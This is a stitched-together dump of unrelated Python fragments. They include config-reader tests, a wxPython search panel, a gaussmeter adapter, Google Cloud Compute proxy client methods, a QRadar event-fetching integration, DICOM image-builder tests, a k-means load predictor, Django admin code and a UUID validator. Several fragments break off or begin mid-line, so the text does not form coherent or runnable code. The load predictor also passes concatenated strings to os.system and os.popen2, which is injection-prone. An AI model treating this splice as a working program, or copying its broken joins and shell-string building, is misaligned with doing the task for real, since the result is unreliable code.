def test_get_returns_string_config_value(self):
'''
Test config value returned is expected value
'''
config = ConfigReader("tests/TestConfigReaderData")
value = config.get("string_test")
self.assertEqual(value, "some value", "Value did not match expected.")
def test_get_with_default_value(self):
"Test the get method returns value if available or the the default."
config = ConfigReader("tests/TestConfigReaderData")
self.assertEqual("some value", config.get("string_test", "default value"))
self.assertEqual("default value", config.get("i_dont_exist", "default value"))
def test_get_handles_namespaced_keys(self):
'''
Test ConfigReader works with namespaced keys like, path.to.element
'''
config = ConfigReader("tests/TestConfigReaderData")
value = config.get("bill-to.given")
self.assertEqual(value, "Chris", "Value did not match expected.")
def test_get_handles_yaml_arrays(self):
'''
Test ConfigReader works with YAML arrays.
'''
config = ConfigReader("tests/TestConfigReaderData")
self.assertEqual("dogs", config.get("list_test")[0])
self.assertEqual("cats", config.get("list_test")[1])
self.assertEqual("badgers", config.get("list_test")[2])
def test_get_with_cascaded_config_files(self):
'''
        Test ConfigReader loaded up with multiple configs loads
        the config preferences in order.
'''
config = ConfigReader("tests/TestConfig2;tests/TestConfig1")
# should take config from config1
self.assertEqual("hello", config.get("setting_from_config1"))
# this will take the config from config2, which has precedence.
self.assertEqual("beautiful", config.get("overwrite_setting"))
        # this will take the setting from config2.
        self.assertEqual("hi", config.get("setting_from_config2"))
def test_get_with_missing_key_and_no_default(self):
"An error should be thrown if the key is missing and no default provided."
config = ConfigReader("tests/TestConfig2;tests/TestConfig1")
# should take config from config1
self.assertRaises(KeyError, config.get, "setting_that_doesnt_exist")
def test_specifying_bad_config_file(self):
"Test error is thrown when invalid config file is specified."
self.assertRaises(ConfigFileReadError, ConfigReader, "tests/TestConfig1,NOSUCHFILE")
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
    unittest.main()
# -*- coding: utf-8 -*-
import os.path
import wx
from outwiker.core.system import getImagesDir
class SearchReplacePanel (wx.Panel):
def __init__(self, parent):
super(SearchReplacePanel, self).__init__(
parent,
style=wx.TAB_TRAVERSAL | wx.RAISED_BORDER)
self._controller = None
self._createGui()
self._bindEvents()
        # List of GUI elements related to replacement
self._replaceGui = [self._replaceLabel,
self._replaceText,
self._replaceBtn,
self._replaceAllBtn,
]
self.setReplaceGuiVisible(False)
def setController(self, controller):
self._controller = controller
@property
def searchTextCtrl(self):
return self._searchText
@property
def replaceTextCtrl(self):
return self._replaceText
@property
def resultLabel(self):
return self._resultLabel
def setReplaceGuiVisible(self, visible):
"""
        Set whether the replacement GUI elements should be shown
"""
for item in self._replaceGui:
item.Show(visible)
self.Layout()
def _bindEvents(self):
self.Bind(wx.EVT_TEXT_ENTER, self.__onEnterPress, self._searchText)
self.Bind(wx.EVT_TEXT_ENTER, self.__onEnterPress, self._replaceText)
self.Bind(wx.EVT_TEXT, self.__onSearchTextChange, self._searchText)
self.Bind(wx.EVT_BUTTON, self.__onNextSearch, self._nextSearchBtn)
self.Bind(wx.EVT_BUTTON, self.__onPrevSearch, self._prevSearchBtn)
self.Bind(wx.EVT_BUTTON, self.__onReplace, self._replaceBtn)
self.Bind(wx.EVT_BUTTON, self.__onReplaceAll, self._replaceAllBtn)
self.Bind(wx.EVT_BUTTON, self.__onCloseClick, self._closeBtn)
for child in self.GetChildren():
child.Bind(wx.EVT_KEY_DOWN, self.__onKeyPressed)
def _createGui(self):
        # Input field for the search phrase
self._searchText = wx.TextCtrl(self, -1, u"",
style=wx.TE_PROCESS_ENTER)
        # Replacement text field
self._replaceText = wx.TextCtrl(self, -1, u"",
style=wx.TE_PROCESS_ENTER)
        # UI elements related to search
self._findLabel = wx.StaticText(self, -1, _(u"Find what: "))
        # "Find next" button
self._nextSearchBtn = wx.Button(self, -1, _(u"Next"))
        # "Find previous" button
self._prevSearchBtn = wx.Button(self, -1, _(u"Prev"))
        # Label showing the search result
self._resultLabel = wx.StaticText(self, -1, "")
self._resultLabel.SetMinSize((150, -1))
        # UI elements related to replacement
        self._replaceLabel = wx.StaticText(self, -1, _(u"Replace with: "))
        # "Replace" button
self._replaceBtn = wx.Button(self, -1, _(u"Replace"))
        # "Replace All" button
        self._replaceAllBtn = wx.Button(self, -1, _(u"Replace All"))
self._closeBtn = wx.BitmapButton(
self,
-1,
wx.Bitmap(os.path.join(getImagesDir(), "close-button.png"),
wx.BITMAP_TYPE_ANY))
self._layout()
def _layout(self):
self._mainSizer = wx.FlexGridSizer(cols=6)
self._mainSizer.AddGrowableCol(1)
        # UI elements for search
self._mainSizer.Add(self._findLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._searchText, 0, wx.ALL |
wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._nextSearchBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._prevSearchBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._closeBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=1)
self._mainSizer.Add(self._resultLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
        # UI elements for replacement
self._mainSizer.Add(self._replaceLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._replaceText, 0, wx.ALL |
wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._replaceBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._replaceAllBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
# self._mainSizer.AddStretchSpacer()
# self._mainSizer.AddStretchSpacer()
self.SetSizer(self._mainSizer)
self.Layout()
def __onNextSearch(self, event):
if self._controller is not None:
self._controller.nextSearch()
def __onPrevSearch(self, event):
if self._controller is not None:
self._controller.prevSearch()
def __onReplace(self, event):
if self._controller is not None:
self._controller.replace()
def __onReplaceAll(self, event):
if self._controller is not None:
self._controller.replaceAll()
def __onSearchTextChange(self, event):
if self._controller is not None:
self._controller.enterSearchPhrase()
def __onKeyPressed(self, event):
key = event.GetKeyCode()
if key == wx.WXK_ESCAPE:
self.Close()
event.Skip()
def __onEnterPress(self, event):
if self._controller is None:
return
if self._replaceText.IsShown():
self._controller.replace()
else:
self._controller.nextSearch()
def __onCloseClick(self, event):
self.Close()
"""
Contains methods for working with the Lakeshore 475 Gaussmeter
"""
from quantities import Quantity
from typing import Optional
from instruments.lakeshore import Lakeshore475 as _Lakeshore475
from time import sleep
class Lakeshore475(object):
"""
Adapter layer for IK's Lakeshore 475 implementation
"""
_port = '/dev/ttyUSB0'
_address = 12
_managed_instance = None
_constructor = _Lakeshore475
@property
def port_name(self) -> str:
"""
:return: The port to which this magnetometer will be attached
"""
return self._port
@port_name.setter
def port_name(self, new_port_name: str) -> None:
"""
:param new_port_name: The new port
:return:
"""
self._port = new_port_name
@property
def address(self) -> int:
"""
:return: The address
"""
return self._address
@address.setter
def address(self, new_address: int) -> None:
"""
:param new_address: The desired address
:return:
"""
self._address = new_address
@property
def _magnetometer(self) -> Optional[_Lakeshore475]:
"""
:return: The instance of the magnetometer that this adapter manages, or
None if there is no instance.
.. note::
The 1 second delay is required for the gaussmeter to reset
itself and accept commands
"""
if self._managed_instance is None:
self._managed_instance = self._constructor.open_gpibusb(
port=self.port_name, gpib_address=self.address)
            sleep(1)
return self._managed_instance
@property
def field(self) -> Quantity:
"""
:return: The measured magnetic field from the Gaussmeter
"""
try:
return self._magnetometer.field
except ValueError:
            return -100000.0 * self._magnetometer.field_units  # type: Quantity
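# Hedged usage sketch (port name and GPIB address shown are just the class
# defaults):
#
#     gaussmeter = Lakeshore475()
#     gaussmeter.port_name = '/dev/ttyUSB0'
#     gaussmeter.address = 12
#     b_field = gaussmeter.field  # first access opens the connection and
#                                 # sleeps 1 s for the instrument reset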
../../../../../../../share/pyshared/orca/scripts/apps/packagemanager/script_settings.py
quota_project_id,
client_info=client_info,
always_use_jwt_access=True,
)
def delete_unary(
self,
request: Union[compute.DeleteTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Deletes the specified TargetTcpProxy resource.
Args:
request (Union[google.cloud.compute_v1.types.DeleteTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.Delete. See the method description for
details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy (str):
Name of the TargetTcpProxy resource
to delete.
This corresponds to the ``target_tcp_proxy`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.Operation:
Represents an Operation resource. Google Compute Engine
                has three Operation resources: \*
[Global](/compute/docs/reference/rest/v1/globalOperations)
\*
[Regional](/compute/docs/reference/rest/v1/regionOperations)
\*
[Zonal](/compute/docs/reference/rest/v1/zoneOperations)
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
                responses. Operations can be global, regional or zonal.
- For global operations, use the globalOperations
resource. - For regional operations, use the
regionOperations resource. - For zonal operations, use
the zonalOperations resource. For more information, read
Global, Regional, and Zonal Resources.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project, target_tcp_proxy])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.DeleteTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.DeleteTargetTcpProxyRequest):
request = compute.DeleteTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy is not None:
request.target_tcp_proxy = target_tcp_proxy
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def get(
self,
request: Union[compute.GetTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.TargetTcpProxy:
r"""Returns the specified TargetTcpProxy resource. Gets a
list of available target TCP proxies by making a list()
request.
Args:
request (Union[google.cloud.compute_v1.types.GetTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.Get. See the method description for
details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy (str):
Name of the TargetTcpProxy resource
to return.
This corresponds to the ``target_tcp_proxy`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.TargetTcpProxy:
Represents a Target TCP Proxy
resource. A target TCP proxy is a
component of a TCP Proxy load balancer.
Global forwarding rules reference target
TCP proxy, and the target proxy then
references an external backend service.
For more information, read TCP Proxy
Load Balancing overview.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project, target_tcp_proxy])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.GetTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.GetTargetTcpProxyRequest):
request = compute.GetTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy is not None:
request.target_tcp_proxy = target_tcp_proxy
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
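    # Hedged usage sketch (client construction is an assumption; the method
    # takes either a request object or flattened fields, but never both):
    #
    #     client = TargetTcpProxiesClient()
    #     # flattened fields:
    #     proxy = client.get(project="my-project", target_tcp_proxy="my-proxy")
    #     # or an explicit request object:
    #     request = compute.GetTargetTcpProxyRequest(
    #         project="my-project", target_tcp_proxy="my-proxy")
    #     proxy = client.get(request=request)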
def insert_unary(
self,
request: Union[compute.InsertTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy_resource: compute.TargetTcpProxy = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Creates a Target |
ng to get events for offense ID: {offense_id}, '
f'offense_start_time: {offense_start_time}, '
f'additional_where: {additional_where}, '
f'events_limit: {events_limit}.')
num_of_failures = 0
while num_of_failures <= max_retries:
try:
print_debug_msg(f'Creating search for offense ID: {offense_id}, '
f'query_expression: {query_expression}.')
ret_value = client.search_create(query_expression=query_expression)
print_debug_msg(f'Created search for offense ID: {offense_id}, '
f'offense_start_time: {offense_start_time}, '
f'additional_where: {additional_where}, '
f'events_limit: {events_limit}, '
f'ret_value: {ret_value}.')
return ret_value
except Exception:
print_debug_msg(f'Failed to create search for offense ID: {offense_id}. '
f'Retry number {num_of_failures}/{max_retries}.')
print_debug_msg(traceback.format_exc())
num_of_failures += 1
if num_of_failures == max_retries:
print_debug_msg(f'Max retries for creating search for offense: {offense_id}. Returning empty.')
break
time.sleep(FAILURE_SLEEP)
print_debug_msg(f'Returning empty events for offense ID: {offense_id}.')
return None
def poll_offense_events_with_retry(client: Client, search_id: str, offense_id: int,
max_retries: int = EVENTS_FAILURE_LIMIT) -> Tuple[List[Dict], str]:
"""
    Polls QRadar service for the given search ID until the returned status is one of {'CANCELED', 'ERROR', 'COMPLETED'}.
Afterwards, performs a call to retrieve the events returned by the search.
    Includes a retry mechanism, because the QRadar service tends to return sporadic errors when
    it is loaded.
    Therefore, up to 'max_retries' retries are made, to avoid such cases as much as possible.
Args:
client (Client): Client to perform the API calls.
search_id (str): ID of the search to poll for its status.
offense_id (int): ID of the offense to enrich with events returned by search. Used for logging purposes here.
max_retries (int): Number of retries.
Returns:
        (List[Dict], str): List of events returned by the query. Returns an empty list if the number of retries
        exceeded the limit, and a failure message in case an error occurred.
"""
num_of_failures = 0
start_time = time.time()
failure_message = ''
while num_of_failures <= max_retries:
try:
print_debug_msg(f"Getting search status for {search_id}")
search_status_response = client.search_status_get(search_id)
print_debug_msg(f"Got search status for {search_id}")
query_status = search_status_response.get('status')
# failures are relevant only when consecutive
num_of_failures = 0
print_debug_msg(f'Search query_status: {query_status}')
# Possible values for query_status: {'CANCELED', 'ERROR', 'COMPLETED'}
            # Don't try to get events if CANCELED or ERROR
if query_status in {'CANCELED', 'ERROR'}:
if failure_message == '':
failure_message = f'query_status is {query_status}'
return [], failure_message
elif query_status == 'COMPLETED':
print_debug_msg(f'Getting events for offense {offense_id}')
search_results_response = client.search_results_get(search_id)
                print_debug_msg(f'Http response: {search_results_response.get("http_response", "Not specified - ok")}')
events = search_results_response.get('events', [])
sanitized_events = sanitize_outputs(events)
print_debug_msg(f'Fetched {len(sanitized_events)} events for offense {offense_id}.')
return sanitized_events, failure_message
elapsed = time.time() - start_time
            if elapsed >= FETCH_SLEEP:  # print status debug every fetch sleep (or after)
print_debug_msg(f'Still fetching offense {offense_id} events, search_id: {search_id}.')
start_time = time.time()
time.sleep(EVENTS_INTERVAL_SECS)
except Exception as e:
print_debug_msg(
f'Error while fetching offense {offense_id} events, search_id: {search_id}. Error details: {str(e)} \n'
f'{traceback.format_exc()}')
num_of_failures += 1
if num_of_failures < max_retries:
time.sleep(FAILURE_SLEEP)
else:
failure_message = f'{repr(e)} \nSee logs for further details.'
print_debug_msg(f'Could not fetch events for offense ID: {offense_id}, returning empty events array.')
return [], failure_message
def enrich_offense_with_events(client: Client, offense: Dict, fetch_mode: str, events_columns: str, events_limit: int,
max_retries: int = MAX_FETCH_EVENT_RETIRES):
"""
Enriches offense given with events.
    Has a retry mechanism for events returned by the query to QRadar. This is needed because events might not be
    indexed when performing the search, and QRadar will return fewer events than expected.
    The retry mechanism here is meant to avoid such cases as much as possible.
Args:
client (Client): Client to perform the API calls.
offense (Dict): Offense to enrich with events.
fetch_mode (str): Which enrichment mode was requested.
Can be 'Fetch With All Events', 'Fetch Correlation Events Only'
events_columns (str): Columns of the events to be extracted from query.
events_limit (int): Maximum number of events to enrich the offense.
max_retries (int): Number of retries.
Returns:
(Dict): Enriched offense with events.
"""
failure_message = ''
events: List[dict] = []
min_events_size = min(offense.get('event_count', 0), events_limit)
    # subtract 1 minute from start_time to avoid the case where the minute queried for start_time equals end_time.
for i in range(max_retries):
        # retry to check if we got all the events (it's not an error retry); see docstring
search_response = create_search_with_retry(client, fetch_mode, offense, events_columns,
events_limit)
if not search_response:
continue
offense_id = offense['id']
events, failure_message = poll_offense_events_with_retry(client, search_response['search_id'], offense_id)
print_debug_msg(f"Polled events for offense ID {offense_id}")
if len(events) >= min_events_size:
print_debug_msg(f"Fetched {len(events)}/{min_events_size} for offense ID {offense_id}")
break
print_debug_msg(f'Did not fetch enough events. Expected at least {min_events_size}. Retrying to fetch events '
f'for offense ID: {offense_id}. Retry number {i}/{max_retries}')
if i < max_retries - 1:
time.sleep(SLEEP_FETCH_EVENT_RETIRES)
print_debug_msg(f"Reached max retries for offense {offense.get('id')} with failure message {failure_message}")
if failure_message == '' and len(events) < min_events_size:
failure_message = 'Events were probably not indexed in QRadar at the time of the mirror.'
offense = dict(offense, mirroring_events_message=failure_message)
if events:
offense = dict(offense, events=events)
return offense
def get_incidents_long_running_execution(client: Client, offenses_per_fetch: int, user_query: str, fetch_mode: str,
events_columns: str, events_limit: int, ip_enrich: bool, asset_enrich: bool,
last_highest_id: int, incident_type: Optional[str],
                                             mirror_direction: Optional[str]) -> Tuple[Opt
import os
from collections import defaultdict
from dataclasses import asdict
from pathlib import Path
from unittest import mock
import numpy as np
import pydicom
import pytest
from panimg.image_builders.dicom import (
_get_headers_by_study,
_validate_dicom_files,
format_error,
image_builder_dicom,
)
from panimg.image_builders.metaio_utils import parse_mh_header
from panimg.panimg import _build_files
from grandchallenge.cases.models import Image
from tests.cases_tests import RESOURCE_PATH
DICOM_DIR = RESOURCE_PATH / "dicom"
def test_get_headers_by_study():
files = [Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]]
studies = _get_headers_by_study(files, defaultdict(list))
assert len(studies) == 1
for key in studies:
assert [str(x["file"]) for x in studies[key]["headers"]] == [
f"{DICOM_DIR}/{x}.dcm" for x in range(1, 77)
]
for root, _, files in os.walk(RESOURCE_PATH):
files = [Path(root).joinpath(f) for f in files]
break
studies = _get_headers_by_study(files, defaultdict(list))
assert len(studies) == 0
def test_validate_dicom_files():
files = [Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]]
studies = _validate_dicom_files(files, defaultdict(list))
assert len(studies) == 1
for study in studies:
headers = study.headers
assert study.n_time == 19
assert study.n_slices == 4
with mock.patch(
"panimg.image_builders.dicom._get_headers_by_study",
return_value={
"foo": {"headers": headers[1:], "file": "bar", "index": 1},
},
):
errors = defaultdict(list)
studies = _validate_dicom_files(files, errors)
assert len(studies) == 0
for header in headers[1:]:
assert errors[header["file"]] == [
format_error("Number of slices per time point differs")
]
def test_image_builder_dicom_4dct(tmpdir):
files = {Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]}
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert result.consumed_files == {
Path(DICOM_DIR).joinpath(f"{x}.dcm") for x in range(1, 77)
}
assert len(result.new_images) == 1
image = Image(**asdict(result.new_images.pop()))
assert image.shape == [19, 4, 2, 3]
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
direction = headers["TransformMatrix"].split()
origin = headers["Offset"].split()
spacing = headers["ElementSpacing"].split()
exposures = headers["Exposures"].split()
content_times = headers["ContentTimes"].split()
assert len(exposures) == 19
assert exposures == [str(x) for x in range(100, 2000, 100)]
assert len(content_times) == 19
assert content_times == [str(x) for x in range(214501, 214520)]
dcm_ref = pydicom.dcmread(str(DICOM_DIR / "1.dcm"))
assert np.array_equal(
np.array(list(map(float, direction))).reshape((4, 4)), np.eye(4)
)
assert np.allclose(
list(map(float, spacing))[:2],
list(map(float, list(dcm_ref.PixelSpacing),)),
)
assert np.allclose(
list(map(float, origin)),
list(map(float, dcm_ref.ImagePositionPatient)) + [0.0],
)
@pytest.mark.parametrize(
"folder,element_type",
[
("dicom", "MET_SHORT"),
("dicom_intercept", "MET_FLOAT"),
("dicom_slope", "MET_FLOAT"),
],
)
def test_dicom_rescaling(folder, element_type, tmpdir):
"""
    2.dcm in dicom_intercept and dicom_slope has been modified to add a
small intercept (0.01) or slope (1.001) respectively.
"""
files = [
Path(d[0]).joinpath(f)
for d in os.walk(RESOURCE_PATH / folder)
for f in d[2]
]
result = _build_files(
        builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
assert headers["ElementType"] == element_type
def test_dicom_window_level(tmpdir):
files = {
Path(d[0]).joinpath(f)
for d in os.walk(RESOURCE_PATH / "dicom")
for f in d[2]
}
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
assert headers["WindowCenter"] == "30"
assert headers["WindowWidth"] == "200"
assert len(result.new_images) == 1
image_obj = result.new_images.pop()
assert image_obj.window_center == 30.0
assert image_obj.window_width == 200.0
" measurements available for state " + state)
sliced_data = None
for j in self.memory[state]['arrayMeas']:
#self.my_logger.debug("DOKMEANS self.memory[state]['arrayMeas'][j]: "+ str(j))
            # If this measurement belongs in the slice we're interested in
if j[0] >= from_inlambda and j[0] <= to_inlambda:
#self.my_logger.debug("DOKMEANS adding measurement : "+ str(j))
# add it
                if sliced_data is None:
sliced_data = np.array(j, ndmin=2)
else:
sliced_data = np.append(sliced_data, [j], axis=0)
k = 1 # number of clusters
        # 1. No known lambda values close to current lambda measurement
        if sliced_data is None:
# Check if there are any known values from +-50% inlambda.
# original_inlambda = float(from_inlambda* (10/9))
# from_inlambda = 0.8 * original_inlambda
# to_inlambda = 1.2 * original_inlambda
# self.my_logger.debug("Changed lambda range to +- 20%: "+ str(from_inlambda) + " - "+ str(to_inlambda))
# for j in self.memory[state]['arrayMeas']:
# #self.my_logger.debug("DOKMEANS self.memory[state]['arrayMeas'][j]: "+ str(j))
# # If this measurement belongs in the slice we're insterested in
# if j[0] >= from_inlambda and j[0] <= to_inlambda:
# # add it
# if sliced_data == None:
# sliced_data = np.array(j, ndmin=2)
# else:
# sliced_data = np.append(sliced_data, [j], axis=0)
# #centroids, label = kmeans2(self.memory[state]['arrayMeas'], k, minit='points') # (obs, k)
# #else:
# if sliced_data == None:
self.log.debug("No known lamdba values close to current lambda measurement. Returning zeros!")
else:
# self.log.debug("DOKMEANS length of sliced_data to be fed to kmeans: " + str(len(sliced_data))
# + " (out of %d total)" % count_state_measurements)
centroids, label = kmeans2(sliced_data, k, minit='points')
pass
# initialize dictionary
num_of_meas = {}
#num_of_meas = {'0': 0, '1': 0, '2': 0, '3': 0, '4': 0}
for j in range(0, k):
num_of_meas[str(j)] = 0
if len(label) > 0:
for i in label:
num_of_meas[str(i)] += 1
max_meas_cluster = max(num_of_meas.iteritems(), key=operator.itemgetter(1))[0]
# self.my_logger.debug("DOKMEANS state: "+ state +" kmeans2 centroids: "+ str(centroids) +" label: "+
# str(num_of_meas) + " cluster with max measurements: "+ str(max_meas_cluster))
ctd['inlambda'] = centroids[int(max_meas_cluster)][0]
ctd['throughput'] = centroids[int(max_meas_cluster)][1]
ctd['latency'] = centroids[int(max_meas_cluster)][2]
ctd['cpu'] = centroids[int(max_meas_cluster)][3]
else:
#self.log.debug("DOKMEANS one of the clusters was empty and so label is None :|. Returning zeros")
ctd['inlambda'] = 0.0
ctd['throughput'] = 0.0
ctd['latency'] = 0.0
ctd['cpu'] = 0.0
#return None
else:
self.log.debug("DOKMEANS self.memory[state]['arrayMeas'] is None :|")
return ctd
def moving_average(self, iterable, n=3):
# moving_average([40, 30, 50, 46, 39, 44]) --> 40.0 42.0 45.0 43.0
# http://en.wikipedia.org/wiki/Moving_average
it = iter(iterable)
d = deque(itertools.islice(it, n - 1))
d.appendleft(0)
s = sum(d)
for elem in it:
s += elem - d.popleft()
d.append(elem)
yield s / float(n)
def predict_load(self):
        # Linear regression to see the slope
        stdin, stdout = os.popen2("tail -n 20 " + self.measurementsFile)
        stdin.close()
        lines = stdout.readlines()
        stdout.close()
ten_min_l = [] # store past 10 mins lambda's
ten_min = [] # store past 10 mins ticks
for line in lines:
            m = line.split('\t\t') # state, lambda, throughput, latency, cpu, time tick
ten_min_l.append(float(m[1]))
ten_min.append(float(m[5]))
# run running average on the 10 mins lambda measurements
n = 5
run_avg_gen = self.moving_average(ten_min_l, n)
run_avg = []
for r in run_avg_gen:
run_avg.append(float(r))
ten_min_ra = ten_min[2:18] # np.arange(i-8, i-2, 1)
# linear regression on the running average
        #(slope, intercept, r_value, p_value, stderr) = linregress(ten_min, ten_min_l)
(slope, intercept, r_value, p_value, stderr) = linregress(ten_min_ra, run_avg)
# fit the running average in a polynomial
coeff = np.polyfit(ten_min, ten_min_l, deg=2)
self.log.debug("Slope (a): " + str(slope) + " Intercept(b): " + str(intercept))
self.log.debug("Polynom coefficients: " + str(coeff))
#self.my_logger.debug("next 10 min prediction "+str(float(slope * (p + 10) + intercept + stderr)))
predicted_l = float(slope * (ten_min[19] + 10) + intercept + stderr) # lambda in 10 mins from now
#predicted_l = np.polyval(coeff, (ten_min[9] + 10)) # lambda in 10 mins from now
if slope > 0:
#if predicted_l > allmetrics['inlambda'] :
dif = 6000 + 10 * int(slope)
#dif = 6000 + 0.2 * int(predicted_l - allmetrics['inlambda'])
self.log.debug("Positive slope: " + str(slope) + " dif: " + str(dif)
+ ", the load is increasing. Moving the lambda slice considered 3K up")
else:
dif = -6000 + 10 * int(slope)
#dif = -6000 + 0.2 * int(predicted_l - allmetrics['inlambda'])
self.log.debug("Negative slope " + str(slope) + " dif: " + str(dif)
+ ", the load is decreasing. Moving the lambda slice considered 3K down")
#dif = ((predicted_l - allmetrics['inlambda'])/ allmetrics['inlambda']) * 0.1 * 6000#* allmetrics['inlambda']
#dif = int((predicted_l / allmetrics['inlambda']) * 6000)
return predicted_l
def publish_to_local_ganglia(self, allmetrics):
"""
Publishes monitoring data to local ganglia agent
:param allmetrics:
:return:
"""
self.log.debug( "TAKEDECISION allmetrics: " + str(allmetrics))
#Publish measurements to ganglia
try:
os.system("gmetric -n ycsb_inlambda -v " + str(
allmetrics['inlambda']) + " -d 15 -t float -u 'reqs/sec' -S " + str(
self.monitoring_endpoint) + ":[DEBUG] hostname")
os.system("gmetric -n ycsb_throughput -v " + str(
allmetrics['throughput']) + " -d 15 -t float -u 'reqs/sec' -S " + str(
self.monitoring_endpoint) + ":[DEBUG] hostname")
os.system(
"gmetric -n ycsb_latency -v " + str(allmetrics['latency']) + " -d 15 -t float -u ms -S " + str(
self.monitoring_endpoint) + ":[DEBUG] hostname")
except:
pass
def handle_metrics(self, client_metrics, server_metrics):
# read metrics
allmetrics = {'inlambda': 0, 'throughput': 0, 'latency': 0, 'cpu': 0}
if not self.debug:
            ## Aggregation of YCSB client metrics
from django.contrib import admin
from django.contrib.flatpages.admin import FlatPageAdmin
from django.contrib.flatpages.models import FlatPage
from django.db import models
from suit_redactor.widgets import RedactorWidget
class FlatPageCustom(FlatPageAdmin):
formfield_overrides = {
models.TextField: {'widget': RedactorWidget(editor_options={'lang': 'en'})}
}
admin.site.unregister(FlatPage)
admin.site.register(FlatPage, FlatPageCustom)
#
# Utility functions
#
import sys
from functools import partial
from uuid import UUID
from hashlib import sha1
from os import path, listdir
from zipfile import ZipFile
from subprocess import Popen, TimeoutExpired
import nacl.utils
import nacl.secret
def isValidUUID(uid):
"""
Validate UUID
    @param uid: UUID value to be verified, can be bytes or str
@return: True if UUID valid, else False
"""
try:
        # attempt conversion from bytes to str
uid = uid.decode('ascii')
except AttributeError:
# is already bytes object
pass
except UnicodeDecodeError:
# uid contains non-ascii characters, invalid UUID
return False
try:
out = UUID(uid, version=4)
except ValueError:
return False
    # check the value converted back from UUID equals the original; the UUID class is not strict on input
return str(out) == uid
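# Hedged usage sketch: the round-trip comparison above is what enforces
# strictness, since UUID() itself accepts e.g. braces or uppercase hex.
#
#     isValidUUID('5be9954c-02e0-4a7a-a552-dfe5b4e7a1b3')    # True (v4)
#     isValidUUID(b'5be9954c-02e0-4a7a-a552-dfe5b4e7a1b3')   # True (bytes ok)
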